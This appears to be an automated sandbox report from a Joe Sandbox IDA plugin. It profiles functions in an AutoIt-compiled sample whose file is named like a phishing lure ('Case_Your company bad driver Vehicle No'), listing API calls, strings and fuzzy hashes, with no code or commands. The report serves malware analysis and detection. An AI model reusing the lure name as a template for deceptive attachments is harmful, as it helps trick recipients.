Function 00C1B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BCFEC6: _wcscpy.LIBCMT ref: 00BCFEE9

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

__wcsnicmp.LIBCMT ref: 00C1B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C1B361

Strings

LPT, xrefs: 00C1B292

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 7deb062c50b1d80dcd8980ffd1b8ef31afb2e76cc71ce9ea5ca68415360a746d
Instruction ID: c4ac6e58896e5755dacf35299e9d6c3d6499e834c1f995d97e84dfd5899839ef
Opcode Fuzzy Hash: 7deb062c50b1d80dcd8980ffd1b8ef31afb2e76cc71ce9ea5ca68415360a746d
Instruction Fuzzy Hash: 74614E75A00215AFCB14EF94C885EEEB7F4AB09310F5140AAF556AB2A1DB70AE84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BC2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BC2AE1

Strings

@, xrefs: 00BC2AD5

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2eed19fa5ed3f4ea1d733f6bf663b67491db0c2daba323ee8e9ba91e4de34b6c
Instruction ID: 10428b0e1535e5fd9a0f07cac20f7b5b8532e4174a13b2f35ec805176024bad3
Opcode Fuzzy Hash: 2eed19fa5ed3f4ea1d733f6bf663b67491db0c2daba323ee8e9ba91e4de34b6c
Instruction Fuzzy Hash: 81514971418B44ABD320AF10DC86BAFBBF8FF85314F82889DF2D9511A1DB708569CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00C199BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BB506B: __fread_nolock.LIBCMT ref: 00BB5089

_wcscmp.LIBCMT ref: 00C19AAE
_wcscmp.LIBCMT ref: 00C19AC1

Strings

FILE, xrefs: 00C199FA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: a11c55c818701c336288116ac69e9f68fe5facb53bb04172b6d768b66cc2733d
Instruction ID: f25456859b589a478ad19def86a85e16bd18ea2a0c537527238bcb17a77bbc3e
Opcode Fuzzy Hash: a11c55c818701c336288116ac69e9f68fe5facb53bb04172b6d768b66cc2733d
Instruction Fuzzy Hash: 0D41D871A00609BBDF30AAA0DC45FEFB7FDDF46710F4000BAB900A7181D675AA4497A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C22882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C228C8

Strings

|, xrefs: 00C22899

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 9ecdaf13082ed479de04499897a2405c0145afc42f5edbe9cdcaf7dd84948e79
Instruction ID: afa9e3b861bdbcd16c1283cf457ddec2f9e94190dc9f723d4f6e8b4d7aceef4e
Opcode Fuzzy Hash: 9ecdaf13082ed479de04499897a2405c0145afc42f5edbe9cdcaf7dd84948e79
Instruction Fuzzy Hash: E5312D71800119AFCF11EFA1DC85EEEBFB9FF08310F104169F815A6266EB715A56DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C36D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C36DC2

Strings

static, xrefs: 00C36D22

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8d25d2cda7a33d0c52bca16238e5f34184baced102cc50b4977489bf4bebac39
Instruction ID: 58c6fae72efc7eeed1b94902cd66be65ddf90e11118b8091d056374477ac2458
Opcode Fuzzy Hash: 8d25d2cda7a33d0c52bca16238e5f34184baced102cc50b4977489bf4bebac39
Instruction Fuzzy Hash: D6318D71220604AEDB109F78CC80BFB77B9FF49724F10862DF9A997190DA71AD91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C12D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C12E3B

Strings

0, xrefs: 00C12DF9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d8d8c9d46d907890902226f8c9a577bcbf6ade380a87f372d80ad28b8b3e25c4
Instruction ID: fe3e5b623c521aff412c98e31edee4f3f67e7e8459970f09bf653aa8593c1160
Opcode Fuzzy Hash: d8d8c9d46d907890902226f8c9a577bcbf6ade380a87f372d80ad28b8b3e25c4
Instruction Fuzzy Hash: DB312735600309ABEF249F48D844BDEBBF5EF06301F14006AE895961A0E7709AD0EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C23CDD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C23D5A

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Strings

AUTOITCALLVARIABLE%d, xrefs: 00C23D4C
, $, xrefs: 00C23D9A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: b667fbb8b6b0b78dc58819c5e64a16b61476a3153edb4e857a98e2e340395e86
Instruction ID: 2c1b54707ebecadfd8d27718ed8c58b5dba97014d3dae15122009a47f442c8d5
Opcode Fuzzy Hash: b667fbb8b6b0b78dc58819c5e64a16b61476a3153edb4e857a98e2e340395e86
Instruction Fuzzy Hash: 0B219131650228AFCF21EF64DC82AED77B9FF44700F4004A4F405AB281DB74EA01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C36943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C369D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C369DB

Strings

Combobox, xrefs: 00C3699D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: ab385eeeee8f853d97d5fc1a1203d4bfa423888e36949ba6661fc682f5a76a3c
Instruction ID: ea6d1dd2d381ca8765c360d0ff6a6c717194f579ac4e01d7315ade02790c2385
Opcode Fuzzy Hash: ab385eeeee8f853d97d5fc1a1203d4bfa423888e36949ba6661fc682f5a76a3c
Instruction Fuzzy Hash: 7211B6716203087FEF119E24DC90FBF376AEB893A4F114124F9689B290D6719D9187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB1D73
Part of subcall function 00BB1D35: GetStockObject.GDI32(00000011), ref: 00BB1D87
Part of subcall function 00BB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB1D91

GetWindowRect.USER32(00000000,?), ref: 00C36EE0
GetSysColor.USER32(00000012), ref: 00C36EFA

Strings

static, xrefs: 00C36EBD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 5bbc5cf0e35801a6e21c03039c0d692f70d32e32b401ad80456587ef11fdd2e6
Instruction ID: 3eb5cffc7aee8c08fecc602188e3477cc028ffbeed1a6e6524370bcc99a54714
Opcode Fuzzy Hash: 5bbc5cf0e35801a6e21c03039c0d692f70d32e32b401ad80456587ef11fdd2e6
Instruction Fuzzy Hash: 0B212972A2020AAFDB04DFA8DD45AFA7BB8FB08314F014A29F955D3250D635E8619B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C36B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C36C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C36C20

Strings

edit, xrefs: 00C36BF5

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5e1b4872433323c048a6f5709fc6578571602c4ed67e4cb8a6a405ee4ec7ea0c
Instruction ID: 96beb412b4b19a5c1fa87defc29b485b08f65138228e901c57b0e2cae407d46c
Opcode Fuzzy Hash: 5e1b4872433323c048a6f5709fc6578571602c4ed67e4cb8a6a405ee4ec7ea0c
Instruction Fuzzy Hash: 6C119D71520208BBEB108E64DC41AEA7769EB04368F208B28F975D31E0C675DC91AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C12E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C12F30

Strings

0, xrefs: 00C12F07

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4af61ef2a43057e6f4935fc699ed3b6ded0246d224248680f1a0fdc7fd6ffb6b
Instruction ID: f7e8a9896dae9c3aa9c2aaf470ab7bc12ba629bfb23dd569bd7d849c267ac18b
Opcode Fuzzy Hash: 4af61ef2a43057e6f4935fc699ed3b6ded0246d224248680f1a0fdc7fd6ffb6b
Instruction Fuzzy Hash: 3011E239901264ABCB20DB98DC44BDD77B9EB03310F0440A5E864A72A0D7B0EEA5E795

Uniqueness

Uniqueness Score: -1.00%

Function 00C224CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C22520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C22549

Strings

<local>, xrefs: 00C22511

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: dcdd7dc08f103b67c0c202ba6c0d8999974f6cbfdb5e21210dc8672504a47921
Instruction ID: e5ca343ccf15a96e3da3cda09c25ce2d7652aca7d75fe1e0a871d0c007ad8484
Opcode Fuzzy Hash: dcdd7dc08f103b67c0c202ba6c0d8999974f6cbfdb5e21210dc8672504a47921
Instruction Fuzzy Hash: FF110EB0500235BADB249F62AC99FBBFFA8FF06351F10C13AF91542840D6706A81DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00C280A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C280C8,?,00000000,?,?), ref: 00C28322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C280CB
htons.WSOCK32(00000000,?,00000000), ref: 00C28108

Strings

255.255.255.255, xrefs: 00C280E3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 87da5be9fa904e7ad5adf2f2053adaa9859d660b39a356439dc079dbaf2d6b93
Instruction ID: 3668bfd1b40fef15515859f74c54a28c03f6415f59306a60ef635cce2e8ba1fd
Opcode Fuzzy Hash: 87da5be9fa904e7ad5adf2f2053adaa9859d660b39a356439dc079dbaf2d6b93
Instruction Fuzzy Hash: B811E134600215ABCB20AF64DC86FFDB374FF14320F10852AE921A76D1DF72A819D695

Uniqueness

Uniqueness Score: -1.00%

Function 00C092E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C09355

Strings

ComboBox, xrefs: 00C092F4
ListBox, xrefs: 00C0931F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0c84aba3d50614393f5ab436afc23901761de114777a1014d8aee2360dd01357
Instruction ID: c2d57dd61be6168c4bcc1a2c92bdf1e48409afe0529f2806f4a664332fd280cc
Opcode Fuzzy Hash: 0c84aba3d50614393f5ab436afc23901761de114777a1014d8aee2360dd01357
Instruction Fuzzy Hash: 5A01B571A45214ABCB14FB64CC929FE77ADFF46320B140659F832672E2DF316908D751

Uniqueness

Uniqueness Score: -1.00%

Function 00C091DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C0924D

Strings

ComboBox, xrefs: 00C091EC
ListBox, xrefs: 00C09217

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 89c523d5f456570aad2b1d1646fcf790dfe086a35deba5234314d340c165edd2
Instruction ID: 3d3389bb20567ca99831c27373dbbf39bb38fb02be31ae5b3a167fc4afb494e5
Opcode Fuzzy Hash: 89c523d5f456570aad2b1d1646fcf790dfe086a35deba5234314d340c165edd2
Instruction Fuzzy Hash: B20144B1A412087BCB14EBA0C992FFF77ACDF55300F241169B912672D2EA756F08D662

Uniqueness

Uniqueness Score: -1.00%

Function 00C09264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C092D0

Strings

ComboBox, xrefs: 00C09271
ListBox, xrefs: 00C0929C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: f7a78a9825055fe36af9f7f014141a643ad190ea8f8b81bef8fd133aa2e428ec
Instruction ID: edf5ad7a52e759b3d6e9be558c737f1774e4909e16ab2cab60d9370036eb305b
Opcode Fuzzy Hash: f7a78a9825055fe36af9f7f014141a643ad190ea8f8b81bef8fd133aa2e428ec
Instruction Fuzzy Hash: 52014FB1A8110877CB14EBA4C992BFE77ACDB15300F241165B912672D2DA719F08D666

Uniqueness

Uniqueness Score: -1.00%

Function 00C151CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C151E8
_wcscmp.LIBCMT ref: 00C151FA

Strings

#32770, xrefs: 00C151F4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 23334a9bf65b817511ce18800457172d9ec060a3e12527efbda8bdd0017291d7
Instruction ID: e18f0efe2e6f143409134c392be7984e44bd1a9d22c4fc29dc4f0bc8e876c0ff
Opcode Fuzzy Hash: 23334a9bf65b817511ce18800457172d9ec060a3e12527efbda8bdd0017291d7
Instruction Fuzzy Hash: 85E06833A0022C2BE3209B99AC49FABF7ECEB41B71F00016BFD14D3040E5709A458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00C081BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C081CA

Part of subcall function 00BD3598: _doexit.LIBCMT ref: 00BD35A2

Strings

AutoIt, xrefs: 00C081BE
Error allocating memory., xrefs: 00C081C3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

